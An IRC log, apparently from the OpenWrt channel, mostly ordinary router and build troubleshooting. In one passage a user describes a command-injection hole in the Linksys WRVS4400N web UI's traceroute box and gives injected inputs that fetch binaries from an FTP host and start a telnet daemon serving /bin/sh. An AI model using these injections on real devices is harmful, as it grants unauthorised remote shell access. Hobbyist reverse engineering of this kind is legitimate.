[00:01] <rickb|server> k once more. I will let it sit longer.
[00:02] <rickb|server> Want me to try wr again?
[00:04] <bflorin> nop
[00:04] <bflorin> what image do u use?
[00:04] <bflorin> this one?
[00:05] <bflorin> http://downloads.x-wrt.org/xwrt/kamikaze/7.09/brcm-2.4/openwrt-brcm-2.4-squashfs.trx
[00:05] <rickb|server> openwrt-wrt54g-2.4-squashfs
[00:05] <forum2006> goto dd-wrt
[00:05] <bflorin> :P
[00:09] <bflorin> rickb|server: http://www.dd-wrt.com/dd-wrtv2/downloads/stable/dd-wrt.v23%20SP2/standard/dd-wrt.v23_wrt54g.bin
[00:09] <bflorin> ;)
[00:09] <rickb|server> Just downloaded it. lol.
[00:09] <bflorin> good luck... go to sleep
[00:09] <bflorin> :D
[00:09] <bflorin> tired
[00:09] <rickb|server> thx
[00:09] <rickb|server> :)
[00:22] <hachi> does dnsmasq have problems with SRV records? I'm getting empty responses to things that should have SRV records
[00:23] <nabcore> check for filterwin2k in /etc/dnsmasq.conf
[00:26] <moonwatcher> nbd: ping
[00:28] <hachi> the option of filtering SRV records flat out breaks xmpp server to server connections, and kinda cripples client to server a little bit
[00:28] <hachi> is this on by default in openwrt's dnsmasq?
[00:30] <nab-core> https://dev.openwrt.org/ticket/2566
[00:31] <hachi> ooo, nift
[00:31] <nab-core> nift?
[00:31] <hachi> 'nifty', sorry
[00:42] <alesan> hey
[00:49] <alesan> mh is there any ARM port of openwrt at the moment?
[00:56] <thepeople> alesan: at91 is an arm based platform
[01:26] <mgouget> Hello!
[02:42] <tinman_gz> anyone know if openwrt is going to support dual card full duplex setups like nstreme?
[02:42] <tinman_gz> or is that just load ballancing on 2 cards?
[02:43] <tinman_gz> s/ballancing/balancing/
[04:39] <TrN> On the WRVS4400N, I have a quick hack.
[04:40] <TrN> You can execute any shell command via a hole in the webui.
[04:40] <TrN> If you are interested.
[04:40] <TrN> Administration -> Diagnostics -> Traceroute, enter ;/bin/cat /proc/cpuinfo
[04:40] <TrN> or whatever. :)
[04:41] <TrN> I just downloaded the GPL sources and decided to have a really quick look at the UI and it has huge holes.
[04:41] <TrN> You can also brice the router by putting invalid characters in places that'll break startup scripts.
[04:41] <TrN> *brick
[04:41] <TrN> I assume this would be a place people might be interested.
[04:42] <TrN> uname is Linux router 2.4.27-star #143 Tue Sep 4 11:09:43 CST 2007 armv4l unknown
[04:43] <TrN> Might not want to leak this one too much until we get this hacked. :b
[04:44] <TrN> Filesystem 1k-blocks Used Available Use% Mounted on
[04:44] <TrN> /dev/ram0 13409 9864 3545 74% /
[04:44] <TrN> it seems writable too.
[04:44] <TrN> at least mounted rw.
[04:45] <TrN> ext2fs
[04:50] <loswillios> TrN: that probably is something that should go into the wiki (toh.openwrt.org)
[04:50] <TrN> I'm suprised nobody mentioned it before.
[04:51] <TrN> I know OpenWRT/DD-WRT/whatever doesn't support this router yet.
[04:51] <TrN> but it seems everyone was anxious for OS access.
[04:51] <loswillios> heh ok
[04:51] <TrN> I hope I can just rebuild the stock firmware as they released it today with dropbear.
[04:52] <TrN> WRVS4400N V1.1.03
[04:52] <loswillios> that would be a start I guess
[04:52] <TrN> Easier to play with at least.
[04:52] <TrN> I have no idea what it would take to port OpenWRT/whatever to this.
[04:55] <TrN> but to be able to install some user defined software would be great I guess.
[04:56] <Arc> so i need to add zebra and nano
[04:57] <Arc> does anyone know where I could find these packages?
[04:59] <thepeople> http://downloads.openwrt.org/kamikaze/packages/
[04:59] <thepeople> quagga is there for routing
[05:00] <Arc> does quagga do bgp?
[05:02] <thepeople> http://www.quagga.net/
[05:02] <Arc> why is it better than zebra?
[05:05] <thepeople> I don't know if it is, either way you will have to compile trunk to get quagga
[05:05] <Arc> trunk doesnt compile for me
[05:09] <thepeople> anything or just some packages?
[05:09] <Arc> it fails after about 5 lines
[05:10] <Arc> some error in one of the basic files
[05:11] <thepeople> do you have a pastebin?
[05:12] <Arc> at the moment im very limited since im typing on a mouseless server with only one vty
[05:13] <Arc> /home/arc/work/kamikaze/include/target.mk:78: *** missing `endif'. Stop.
[05:13] <Arc> make[3]: *** [target/linux/prereq] Error 2
[05:13] <Arc> make[2]: *** [/home/arc/work/kamikaze/staging_dir//stamp/.target_prereq] Error 2
[05:13] <Arc> that is the first line it posts now when I run make
[05:14] <thepeople> try removing tmp/ and then update trunk and run make menuconfig then make
[05:19] <Arc> btw b1:41:e1:2c:ed:b0:60:27:50:4f:74:3e:41:b6:2c:bc:c7:f1:fb:a0 is correct?
[05:19] <thepeople> ?
[05:21] <Arc> for the server fingerprint
[05:21] <Arc> what does this mean?
[05:21] <Arc> Collecting package info: package/b43ERROR: please fix package/b43/Makefile
[05:23] <thepeople> it means that the makefile hasn't been updated since there was a change in the build system
[05:23] <thepeople> make sure that your packages directory has been updated
[05:24] <Arc> ++ mkdir -p /home/arc/work/kamikaze/staging_dir/toolchain-_gcc4.1.2
[05:24] <Arc> ++ cd /home/arc/work/kamikaze/staging_dir/toolchain-_gcc4.1.2
[05:24] <Arc> ++ mkdir -p bin lib include stamp
[05:24] <Arc> Checking 'bison'... ok.
[05:24] <Arc> and then the same error as before.
[05:26] <thepeople> hmm, I don't know then
[05:26] <thepeople> I don't see that with the latest verson of trunk
[05:27] <Arc> and how do i update the packages? i just downloaded both tonight and svn up on the packages directory doesnt yield that many changes
[05:28] <thepeople> svn up on the packages directory updates it
[05:29] <Arc> well it didnt update all the makefiles it was complaining about
[05:32] <Arc> if i delete the offending file, svn up, then make, it still generates that error
[05:34] <TrN> Can anyone send me a utelnetd binary, by chance?
[07:05] <onovy> hi, i just re-flashed asus wl-hdd with new revision of kamikaze, it's booting only to failsafe with reset button pushed, and if i try to do 'firstboot' or mount_root i will write:
[07:05] <onovy> Segmentation fault
[07:05] <onovy> MTD partition not found.
[07:09] <onovy> huh, 'less' is segfaulting too :(
[07:11] <pc500> Can I use a white russian package on kamikaze?
[07:13] <Soopaman_Luva> sn9, awake?
[07:44] <sn9> Soopaman_Luva: a bit busy atm
[07:49] <Arc_> wow, a new way to spam IRC.
[07:50] <sn9> it doesn't go in the public log, btw
[08:00] Action: gotnone has been waiting for a reason to go to Vietnam... :P
[08:00] <TrN> haha.
[08:00] <TrN> I did it, I got shell access to a WRVS4400N via telnet with only the webui.
[08:01] <TrN> no flashing.
[08:01] <gotnone> anyway is the 4400 an ar7 based machine?
[08:02] <TrN> Not sure how to even tell.
[08:02] <TrN> Processor : FA526id(wb) rev 1 (v4l)
[08:02] <TrN> BogoMIPS : 153.60
[08:02] <TrN> Features : swp half thumb
[08:02] <TrN> Hardware : STAR_STR9100
[08:02] <TrN> binaries are identified as ARM by file.
[08:03] <gotnone> ahh, nope, ar7's are mipsel
[08:03] <TrN> ELF 32-bit LSB executable, ARM, version 1 (ARM), for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped
[08:04] <sn9> TrN: what brand is that?
[08:04] <sn9> not linksys...
[08:04] <gotnone> is there a table of hardware entry for your device?
[08:04] <TrN> linksys
[08:05] <TrN> no idea.
[08:05] <sn9> what kinds of connectors does it have?
[08:06] <TrN> It's got 5 gige.
[08:06] <TrN> I got a shell by exploiting unchecked input in the webui.
[08:06] <TrN> And used that to upload a cross-compiled mknod to create /dev/pts entries, then upload a utelnetd binary I also cross-compiled.
[08:07] <sn9> 5 gige? 4 lan, 1 wan?
[08:07] <TrN> Yes, but all one swtich.
[08:07] <sn9> nothing else?
[08:08] <TrN> well, 802.11/g/b/n
[08:08] <sn9> ok...
[08:08] <TrN> 64MB RAM, 8MB flash
[08:08] <sn9> 64???????????
[08:08] <TrN> Yes, 64MB.
[08:08] <TrN> # free
[08:08] <TrN> total used free shared buffers
[08:08] <TrN> Mem: 62320 52260 10060 0 476
[08:08] <sn9> that model will not be in production long, then.....
[08:09] <TrN> It's "Linksys Business"
[08:09] <sn9> ah
[08:09] <TrN> "Gigabit VPN Security Router"
[08:09] <TrN> the firmware originally was the worst crap ever.
[08:09] <sn9> oh, those stupid vpn things
[08:09] <sn9> there are very few of those in the TOH
[08:10] <sn9> did it come from a store shelf?
[08:11] <TrN> Yep, it's out normally now.
[08:11] <sn9> for something like $250, right?
[08:11] <TrN> Yeah.
[08:13] <TrN> # cli
[08:13] <TrN> Welcome to Vitesse Ethernet Switch Command Line Interface
[08:13] <TrN> This has all sorts of cool functions.
[08:13] <hkkl> hmmmh.
[08:13] <hkkl> it's hw switch?
[08:13] <hkkl> cool
[08:13] <TrN> # cli -c "?"
[08:13] <TrN> Commands at top level:
[08:13] <TrN> ------
[08:13] <TrN> System - System commands
[08:13] <TrN> Port - Port commands
[08:13] <sn9> switch and "vpn router"
[08:13] <TrN> Sorry.
[08:14] <sn9> it happens
[08:14] <TrN> Anyway...
[08:14] <hkkl> no i was just thinking that it seems like it's asic based switch chip
[08:14] <TrN> this has more features on this program than the web ui does.
[08:15] <sn9> traditionally, that was the case
[08:15] <hkkl> hmmmh, VSC7385 is most likely the chip
[08:15] <c0ffee> i have a problem with kamikaze 7.09, after a few hours uptime, something allocates nearly all memory
[08:16] <TrN> Lacp - 802.3ad LACP Link Aggregation commands
[08:16] <TrN> Rstp - 802.1w RSTP Rapid Spanning Tree commands
[08:16] <TrN> etc
[08:16] <hkkl> jea
[08:16] <hkkl> i'm reading the spec sheet for the chip
[08:16] <c0ffee> i first suspected some userspace app, but according to ps w and top, none of them allocate more than a few kilobyte
[08:16] <sn9> c0ffee: do you have "top" in your busybox?
[08:16] <c0ffee> yes, but nothing allocates more than a few k
[08:16] <notizblock> i wanted to download kamikaze for wrt54gl, but i couldnt find an image in brcm-2.4 tree
[08:16] <sn9> you can sort top output by memory usage
[08:17] <c0ffee> yeah :/
[08:17] <notizblock> which version of kamikaze should i use for wrt54gl ?
[08:17] <c0ffee> i also suspected the tmpfs so i mounted /tmp on some external disk instead
[08:17] <c0ffee> that wasn't the problem as well
[08:18] <sn9> c0ffee: if you don't see anything in top, my guess would be a kernel module
[08:18] <TrN> hkkl/sn9: It's 3am and I'm going to bed.
[08:18] <c0ffee> sn9, any idea how to figure out which?
[08:18] <TrN> But I'm going to compile dropbear and install it on here.
[08:18] <TrN> and I have the GPL source compiling.
[08:18] <TrN> want to see if it works.
[08:18] <TrN> if so I'll just make a new image that has SSH support.
[08:19] <TrN> amazed nobody has hacked this box before, full sources, and it's pretty easy to get a shell.
[08:19] <sn9> c0ffee: rmmod one at a time
[08:19] <TrN> The Intrusion Protection System on this isn't part of the GPL source.
[08:19] <TrN> its also a scary module.
[08:19] <TrN> Module Size Used by
[08:19] <TrN> qr 10240 0
[08:19] <TrN> kris 562304 0
[08:20] <TrN> distributed as kris.o
[08:21] <TrN> http://www.linksys.com/servlet/Satellite?c=L_Product_C2&childpagename=US%2FLayout&cid=1154659754557&pagename=Linksys%2FCommon%2FVisitorWrapper
[08:21] <sn9> haha
[08:23] <sn9> well, only one way to hack that now...
[08:23] <TrN> once I can recompile the stock firmware I'll feel better.
[08:24] <hkkl> TrN: does the switch support vlans? that doesn't get mentioned on brochure i'm reading.
[08:24] <TrN> Yes it does.
[08:24] <TrN> VLAN - VLAN commands
[08:24] <TrN> PVLAN - Private VLAN commands
[08:25] <hkkl> http://www.vitesse.com/products/download.php?fid=269&number=VSC7385&action=do
[08:25] <hkkl> that's the chip i presume it has
[08:25] <TrN> it has a nice example:
[08:25] <TrN> - Port 1 access port in VLAN 100
[08:25] <TrN> - Port 2 hybrid port in VLAN 100 (untagged) and VLAN 101 (tagged)
[08:25] <TrN> - Port 3 trunk port in VLAN 100 and VLAN 101
[08:25] <hkkl> ah, now i found 4k VLANs mentioned
[08:25] <hkkl> yeah.
[08:26] <hkkl> then if it can handle enough simultaneous vlans, 32+, that's pretty cool box
[08:26] <TrN> It even tells you how long your cables are when you plug them in. :b
[08:27] <sn9> surely, not until you also plug in the other end...
[08:30] <TrN> damn DSL
[08:34] <TrN> this is interesting...
[08:34] <hkkl> TrN: has the kernel module for that switch chip, or is there only managing interface in userspace?
[08:35] <sn9> a userspace PHY driver? that would suck
[08:35] <hkkl> sn9: basicly that's SoC switch
[08:35] <TrN> Star9100 Giga Bit Switch ARL Table
[08:35] <TrN> arl_reg_0 : 0
[08:35] <TrN> arl_reg_1 : 130037f1
[08:36] <hkkl> so it might be connected in some pervert way to the rest of the board
[08:37] <sn9> this isn't the 80's -- that kind of design is out of style
[08:37] <hkkl> hey, it's linksys ;)
[08:39] <sn9> at least linksys isn't making full routers run on avr chips
[08:39] <TrN> # cat mtd
[08:39] <TrN> dev: size erasesize name
[08:39] <TrN> mtd0: 00020000 00008000 "BootLoader "
[08:39] <TrN> mtd1: 00020000 00020000 "System Configuration"
[08:39] <TrN> mtd2: 00120000 00020000 "Signature"
[08:39] <TrN> mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
[08:39] <TrN> damn
[08:39] <hkkl> pastebin ;)
[08:39] <TrN> yeah.
[08:39] <TrN> well, just these two are interesting.
[08:39] <TrN> mtd3: 004a0000 00020000 "Main CPU(9202) Kernel"
[08:39] <TrN> mtd4: 00200000 00020000 "Wireless CPU(9109) Kernel"
[08:40] <sn9> two SoC's?
[08:40] <hkkl> have you opened the box?
[08:40] <sn9> the amiga of routers
[08:40] <TrN> No, I have not, and I dont' really want to void my warranty. :)
[08:41] <hkkl> damn, gonna order one to office
[08:41] <TrN> If anyone is interested....
[08:41] <hkkl> that seems really interesting design
[08:41] <TrN> go to webui, Administration -> Diagnostics, and type the following in the traceroute host box:
[08:41] <TrN> ;/usr/bin/ftpget -v ftp.trnsz.ath.cx /bin/mknod mknod
[08:41] <TrN> ;/bin/mknod /dev/pts/0 c 136 0
[08:41] <TrN> ;/usr/bin/ftpget -v ftp.trnsz.ath.cx /usr/sbin/utelnetd utelnetd
[08:41] <TrN> ;/usr/sbin/utelnetd -p 9023 -l /bin/sh -d
[08:42] <TrN> one port available to telnet in on, woop.
[08:42] <TrN> err, drop ftp. from those, if you want my binaries.
[08:42] <sn9> TrN: can you tell what the bootloader is? something known?
[08:42] <TrN> but anyway.
[08:42] <TrN> sn9: How would I find out?
[08:42] <TrN> I'm not so much the linux guy.
[08:43] <TrN> I'm also not sure if anything survives a reboot or if it's decompressed from flash to RAM.
[08:43] <sn9> can you retrieve files from it?
[08:43] <TrN> considering it's /dev/ram0, I assume its the latter.
[08:43] <TrN> sure, it has ftpput on it.
[08:44] <TrN> it seems that they don't check input on the traceroute box when they shell out to traceroute. :)
[08:44] <TrN> leaves a nice open hole.
[08:44] <sn9> dd if=/dev/mtd/0 of=/tmp/mtd0
[08:44] <sn9> then ftpput the resulting file
[08:44] <TrN> no dd.
[08:45] <sn9> cat?
[08:45] <TrN> Yes, if that'll work.
[08:45] <sn9> cat /dev/mtd/0 > /tmp/mtd0
[08:45] <TrN> Right, just no /dev/mtd
[08:45] <TrN> I'd have to mknod entries for it, like I had to do for the ptys, I guess.
[08:45] <sn9> k
[08:46] <TrN> You know what they are?
[08:46] <sn9> just a sec
[08:46] <TrN> wait, found it.
[08:46] <sn9> k
[08:47] <TrN> strings are interesting, it is something propriatary
[08:48] <sn9> name?
[08:48] <TrN> no idea.
[08:48] <TrN> Hit any key to stop autoboot: %%2d Now bootup on 9202
[08:48] <TrN> Now bootup on 9109
[08:48] <TrN> inits both CPUs here.
[08:48] <TrN> ## Switch baudrate to %d bps and press ENTER ...
[08:48] <TrN> ## Ready for binary (kermit) download ...
[08:48] <TrN> fun.
[08:49] <hkkl> 2 cpus and switchchip.
[08:50] <TrN> This is Boot world!
[08:50] <TrN> ýYou push buttom !
[08:50] <TrN> hah
[08:50] <TrN> nice speling.
[08:51] <TrN> It has lots of commands.
[08:51] Action: Philip5-aWay is Away, Reason: ( at work ) | Since: ( Friday, November 2, 2007. 08:41:00 ) Xlack v2.1
[08:51] <sn9> well, now we know it's called "boot world"
[08:52] <hkkl> This is SPARTA!
[08:53] <PointyPumper> PASTAAAAAAAAAAAAAAAA
[08:54] <sn9> pasta on vista
[08:56] <TrN> I might be crazy.
[08:56] <TrN> but it seems like both CPUs run Linux.
[08:57] <sn9> could be
[08:57] <onovy> dualcore openwrt :]. on first cpu you can run kernel processes, and on second dropbear, coool :]
[08:57] <sn9> onovy: why not smp?
[08:57] <onovy> sn9: just kidding
[08:57] <onovy> smp is fine
[09:00] <TrN> first lines in /etc/rcS are:
[09:00] <TrN> #For two CPU communicate issue, UP eth2 at the very front. David @May 27
[09:00] <TrN> ifconfig eth2 up
[09:01] <onovy> eth2 is ethernet connected to second cpu?
[09:01] <sn9> fake ethernet connecting the two cpu's?
[09:01] <TrN> no idea.
[09:02] <TrN> br0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <TrN> eth0 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <TrN> eth1 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BD
[09:02] <TrN> eth2 Link encap:Ethernet HWaddr 00:13:10:DB:BD:BC
[09:02] <onovy> maybe there is one bus, two cpus and two kernel running on it
[09:02] <onovy> so no smp
[09:02] <onovy> but two systems standalone
[09:02] <TrN> not SMP for sure.
[09:03] <onovy> so that should be really ethernet for connection two internal systems
[09:03] <TrN> it must be for switch -> wlan
[09:03] <onovy> there is 3 eths
[09:04] <sn9> any idea what the wlan chipset is?
[09:05] <TrN> https://gullfoss2.fcc.gov/prod/oet/forms/blobs/retrieve.cgi?attachment_id=691357&native_or_pdf=pdf
[09:06] <TrN> http://www.starsemi.com.tw/vEng/product.php
[09:06] <sn9> i'm not inclined to look at a pdf atm
[09:06] <TrN> has a 9109 and 9202 it seems.
[09:07] <TrN> VSC7385 is switch
[09:07] <TrN> and marvell topdog draft2 wlan.
[09:07] <TrN> and yes it is running two linux kernels it seems.
[09:07] <sn9> ah
[09:07] <sn9> does the gpl source by any chance include wlan drivers?
[09:09] <TrN> sn9: No, just binaries.
[09:09] <TrN> seems the 9109 is the wlan one and is eth2 bridged.
[09:10] <TrN> the CPU i'm on is the 9202.
[09:10] <TrN> it seems the wlan cpu doesn't have any access to flash or whatever.
[09:10] <sn9> i wonder why they need a whole cpu just for wlan
[09:11] <TrN> these cpus aren't fast it seems.
[09:11] <sn9> so they saved money by adding more components? i think not
[09:12] <TrN> maybe these two soc == cheaper than fast CPU doing everything?
[09:12] <sn9> highly unlikely
[09:14] <hkkl> quite unlikely yea.
[09:14] <TrN> ah, neat.
[09:14] <TrN> NAT is done by the hardware.
[09:14] <TrN> and so is the IPS, thats why its that weird kris.o
[09:15] <TrN> and thats why NAT seems configured by /proc/strXXXX
[09:15] <hkkl> perverse things
[09:15] <hkkl> i just looked at sequans wimax SoC chip, it's also quite perverted thing
[09:16] <TrN> I bet if you weren't using the hardware NAT and stuff this box would be slow.
[09:16] <hkkl> yea
[09:16] <hkkl> asics are the way to go for network performance
[09:16] <TrN> Well, I did figure out the way to make all the lights on the front do weird things. :)
[09:18] <TrN> yep.
[09:18] <TrN> bridge name bridge id STP enabled interfaces
[09:18] <TrN> br0 8000.001310dbbdbc no eth0
[09:18] <TrN> eth2
[09:19] <TrN> eth2 is CPU2 for WLAN.
[09:19] <TrN> there are two kernels in the source tree.
[09:20] <TrN> the 9109 is just wlan stuff.
[09:20] <TrN> would be interesting to enable telnet to this one too, on another port. :)
[09:21] <TrN> I will do this once I rebuild the firmware and put ssh in both images.
[09:22] <TrN> Yes, it runs linux twice.
[09:22] <TrN> crazy
[09:23] <TrN> the config scripts in the other one bring up eth0 which is eth2 to the main CPU.
[09:23] <onovy> i was right :]
[09:24] <hkkl> does the main cpu see switchchip as eth-interfaces?
[09:24] <TrN> not really sure how to tell.
[09:24] <TrN> I think thats the only way it sees the other 'CPU'
[09:26] <TrN> /etc/issue on that CPU says:
[09:26] <TrN> Copyright (C) 2005 Starsemi ramdisk 1.0
[09:26] <hkkl> hmmh, 9109 has one 1Gbe that is integrated to chip, and 9202 has 2
[09:26] <hkkl> so it might be something like 9109-9202-switch
[09:27] <sn9> makes sense
[09:27] <TrN> the WLAN CPU seems to run hostapd/iwconfig/etc.
[09:28] <TrN> it loads the WLAN driver module, waits 10 seconds, turns its ethernet on, then attaches to the bridge.
[09:28] <sn9> lsmod
[09:28] <TrN> runs something called /bin/recvcmd &
[09:28] <TrN> thats it.
[09:29] <TrN> sn9: I'm just on the WLAN CPU by reading sources, can't access it yet. :)
[09:29] <sn9> ok, what does it insmod?
[09:29] <TrN> woah.
[09:29] <TrN> there is a sendcmd on this side. :)
[09:30] <hkkl> hahaha
[09:30] <TrN> # ./sendcmd "/bin/ls"
[09:30] <TrN> bin
[09:30] <TrN> dev
[09:30] <TrN> success. :)
[09:30] <TrN> lol
[09:31] <TrN> this rocks.
[09:32] <TrN> http://pastebin.com/m7755b887
[09:33] <hkkl> mmh, 174 euros at local store
[09:33] <hkkl> gonna order one
[09:33] <TrN> this is crazy too...
[09:33] <TrN> # ./sendcmd "ls" "ls" "ls"
[09:33] <TrN> Send File's Name success!
[09:33] <TrN> Send File's Data fail!
[09:34] <TrN> something tells me I can xfer data between them if I figure out the syntax.
[09:34] <TrN> it segfaults without parameters. :)
[09:35] <TrN> it sees 32mb of ram on that side.
[09:36] <TrN> ooh.
[09:36] <TrN> they both see the switch it seems.
[09:38] <TrN> this rocks.
[09:38] <TrN> its like two machines in one. :)
[09:38] <TrN> userland is extremely minimal there tho.
[09:39] <TrN> # ./sendcmd "busybox1" "/bin/busybox"
[09:39] <TrN> Send File's Name success!
[09:39] <TrN> Send File's Data success!
[09:39] <TrN> woo.
[09:40] <TrN> yep, it transferred.
[09:42] <TrN> haha
[09:42] <TrN> this rocks.
[09:42] <TrN> I gotta sleep, but I'll write this up tomorrow. :)
[09:43] <TrN> then I'll xfer the telnet over to that box too. :)
[09:43] <TrN> "box"
[09:43] <TrN> gnite all.
[09:43] <hkkl> nite
[09:43] <lan`> yyaawwhmmm
[09:43] <lan`> good morning..
[09:46] <c0ffee> somehow i feel that nfs is leaking memory
[09:46] <sn9> server?
[09:46] <c0ffee> yes
[09:47] <c0ffee> i watched my system, and when some client started to use nfs, suddendly 16mb of memory where allocated
[09:47] <c0ffee> (the rpc.nfsd process however only uses ~1mb)
[09:47] <sn9> any particular reason you want to run nfs as a server on your wrt?
[09:48] <c0ffee> i have a hdd attached to the box where i store backups from various clients on
[09:48] <sn9> but why nfs?
[09:48] <c0ffee> what else?
[09:49] <c0ffee> "else" has to support unix access rights and hardlinks
[09:49] <sn9> sshfs does that
[09:49] <sn9> so does afs
[09:50] <c0ffee> and they are more cpu-usage friendly than nfs?
[09:50] <sn9> sshfs uses fuse
[09:50] <c0ffee> yes, i know, but ssh alone is pretty heavy on the cpu
[09:50] <sn9> true
[09:51] <c0ffee> and afs would be better than nfs?
[09:51] <sn9> generally considered to be, but it's a whole other can of worms
[09:52] <sn9> then there is coda
[09:52] <c0ffee> uh
[09:52] <c0ffee> coda is an alias for dataloss
[09:53] <c0ffee> well, i'll disable nfs for now and see whether it still leaks memory
[09:53] <sn9> try "nbd" (network block device)
[09:54] <c0ffee> only one client can use a nbd at one time
[09:54] <c0ffee> same for iscsi
[09:54] <sn9> not true
[09:54] <c0ffee> hum
[09:54] <c0ffee> and how would concurrent writes to the same fs work?
[09:54] <sn9> one one can write, but many can read
[09:55] <sn9> s/one/only/
[09:55] <c0ffee> well, i have several clients that store backups on the disc
[09:55] <sn9> each can be a separate nbd
[10:53] Action: Nix pokes blogic
[11:11] <blogic> Nix: y0
[11:13] <blogic> Nix: got some news about the danube
[11:14] Action: Nix holds his breath
[11:14] <blogic> Nix: more problems with mtd :-)
[11:14] <Nix> :-
[11:14] <Nix> (
[11:15] <blogic> i can mount the jffs2 but it decides to reinit the fs on every bootup
[11:15] <blogic> anyway
[11:15] <blogic> was only home for an hour last night
[11:15] <blogic> when i get home tonight, i will send you the files first thing
[11:16] <nbd> if it reinits the fs on every bootup, then there must be something really wrong, since it didn't even erase the block with the eof marker
[11:18] <blogic> yes it did erase that
[11:18] <blogic> i get a deadcode thing and then the next boot no dead code, but a reinit
[11:18] <nbd> oh
[11:18] <blogic> and then all the files i created are gone
[11:19] <nbd> what does it say when it does the reinit?
[11:19] <blogic> and yes, there is summin really wrong, the shitty code
[11:19] <blogic> nothing
[11:19] <blogic> i just noticed when adding debug code in jffs
[11:32] <heruan> I'm on ar7 with acx-mac80211. I can successfully authenticate with wpa_supplicant on wlan0 and ping works.
[11:32] <heruan> The problem is when I try to bridge wlan0 and eth0: ping does not work anymore!
[11:32] <heruan> I get a series of: phy0: tx error 0x20, buf 14!
[11:33] <heruan> but if I remove eth0 from the bridge, leaving wlan0 alone on the bridge... it works again
[11:55] <N-Mi_> I'm trying to build a package using Openwrt's SDK, but it complains not to have rule "compile"
[11:56] <N-Mi_> what is the state of the SDK for Kamikaze
[11:56] <N-Mi_> tried with rev 8440 and 9465
[11:56] <N-Mi_> same error
[11:58] <N-Mi_> I've tried with an home made hello-world package (from GNU's hello software demo), and by coying a package directory from Openwrt, same error (so my package is not faulty I think)
[13:13] <t_p> where i can get images for Edimax routers? i want to test it
[13:13] <t_p> or maybe sdk?
[13:15] <Smooth-Z> hey folks!
[13:16] <Smooth-Z> i'm using Kamikaze 7.09 and followed the instructions at http://wiki.openwrt.org/UsbStorageHowto to boot from a USB device; however after a reboot, the system which comes up seems to have no sane defaults at all (i see no interfaces defined, no lan, no wan, nothing...)
[13:16] <Smooth-Z> could anyone point me to the right direction for getting this fixed?
[13:23] <skwashd-laptop> today i stupidly bought a WRT54G v7 :(
[13:23] <skwashd-laptop> hey wrt
[13:23] <denken> whoops
[13:23] <skwashd-laptop> am i better off buying a asus wl550gw or a wrt54gl ?
[13:24] <skwashd-laptop> denken: yeah ... reading a compatibility table in a store on mobile phone isn't the best
[13:27] <starch> big whoops
[13:28] <skwashd-laptop> starch: yeah ... i needed a paperweight for my desk ... so that will do the trick ... now i just need a hackable router ;)
[13:57] <stacato> skwashd-laptop: if you didn't pay too much for it, it's not the sexiest paper weight but it will do. :)
[13:58] <skwashd-laptop> stacato: better than a 15" CRT :)
[13:58] <skwashd-laptop> any suggestions for what i should buy next?
[13:58] <stacato> oh, i still got a 15" CRT
[13:58] <stacato> i would be happy if you would take it off my desk
[13:58] <stacato> along with it's 17" brother
[13:59] <stacato> :)
[13:59] <skwashd-laptop> the back of my car is loaded up ready to go to the PC recyclers tomorrow
[13:59] <stacato> for the device. it depends what you want to do really. with hdd? multiple wifi cards?
[14:00] <skwashd-laptop> just a wifi router
[14:00] <skwashd-laptop> with a bit more than just stock features
[14:01] <skwashd-laptop> i currently run ipcop + WAP54G
[14:01] <skwashd-laptop> but i want something a little less power intensive than a PIII
[14:02] <skwashd-laptop> openvpn is a must have
[14:03] <stacato> the router boards sound like a nice device
[14:05] <skwashd-laptop> stacato: one more requirement ... available over the counter on a saturday morning in australia
[14:05] <stacato> hmmmmm. check the Table of Hardware for Dingo
[14:05] <stacato> :)
[14:06] <stacato> nope, doesn't list it
[14:07] <skwashd-laptop> dingo?
[14:08] <stacato> The dingo (plural dingoes or dingos) or warrigal, Canis lupus dingo, is a type of wild dog, probably descended from the Indian Wolf (Canis Indica). [2] It is commonly described as an Australian wild dog,
[14:08] <stacato> :)
[14:09] <stacato> you said it should be available over the counter on a saturday morning in australia.
[14:09] <skwashd-laptop> stacato: i know what a dingo is
[14:09] <stacato> i couldn't think of anything else readily available
[14:09] <skwashd-laptop> lol
[14:09] <skwashd-laptop> well ... i think i will try to get my hands on a WL-550GE then
[14:09] <stacato> except maybe a trucker hat and outback roadkill
[14:10] <stacato> if you have the chance to pick hardware. look for something really solid.
[14:10] <stacato> it's not like you are in a situation of that you have something and you want to put OpenWRT on it. so spend some time looking for something good.
[14:11] <skwashd-laptop> the WL550GE looks good to me
[14:11] <ataraxus> i have some trouble with my atheros card(on openwrt kamikaze 7.06). i cant set the txpower higher than 17dbm. i tried many variations with the regdomain and the countrycode but none has worked. has somebody experienced the same trouble or solved it?
[14:11] <skwashd-laptop> i bought the WRT54G v7 cos they had sold out of the asus one
[14:11] <skwashd-laptop> and i had driven over there to get it
[14:11] <stacato> skwashd-laptop: check if these are available to you in down under. http://www.routerboard.com/
[14:13] <stacato> if you werent so far away i could send you one of spare speedport W500V's. then again. they are currently useless when it comes to openwrt. :(
[14:13] Action: Agiofws Hello
[14:13] <skwashd-laptop> swap you a WRT54G v7 ;)
[14:14] <stacato> heh
[14:14] <ataraxus> hey
[14:14] <stacato> even more useless
[14:14] <skwashd-laptop> i think if i went for something like that i would just grab something from yawarra.com.au and throw pfsense on it
[14:20] <Ydef> the wrt600n looks to revo the industry
[14:20] <troffasky> revo?
[14:23] <skwashd-laptop> stacato: thanks for your help
[14:25] <Rince> question: my pppd seems to die when my connection gets terminated. Is there a way to say that the pppd should be restarted if it gets terminated?
[14:28] <Soopaman_Luva> hmm... somewhat stupid question
[14:29] <Soopaman_Luva> but could one use a regular wireless n mini-pci card in a router?
[14:29] <stacato> skwashd-laptop: i didn't do much. :)
[14:29] <Rince> Soopaman_Luva: that depends on wether your router has a mini-pci-port and the Operating System does supportit
[14:30] <Soopaman_Luva> rince, have the mini pci port
[14:30] <stacato> Ydef: how do you mean ?
[14:31] <Soopaman_Luva> and working on getting into the box to upgrade it's pre-built linux tools
[14:33] <lBoxy> any solution for us unlucky who running Vista and samba 2.x?
[14:44] <Soopaman_Luva> sn9, you around, have some pics of my router's mainboard
[14:46] <sn9> which router was that, again?
[14:52] <Soopaman_Luva> sn9, ovislink wmu9000vpn
[14:52] <Soopaman_Luva> went and bought a usb to rs232 adapter aswell
[14:52] <sn9> oh, right
[14:53] <Soopaman_Luva> so i just need to figure out if i should solder a header directly on the board
[14:53] <sn9> a header is already indirect
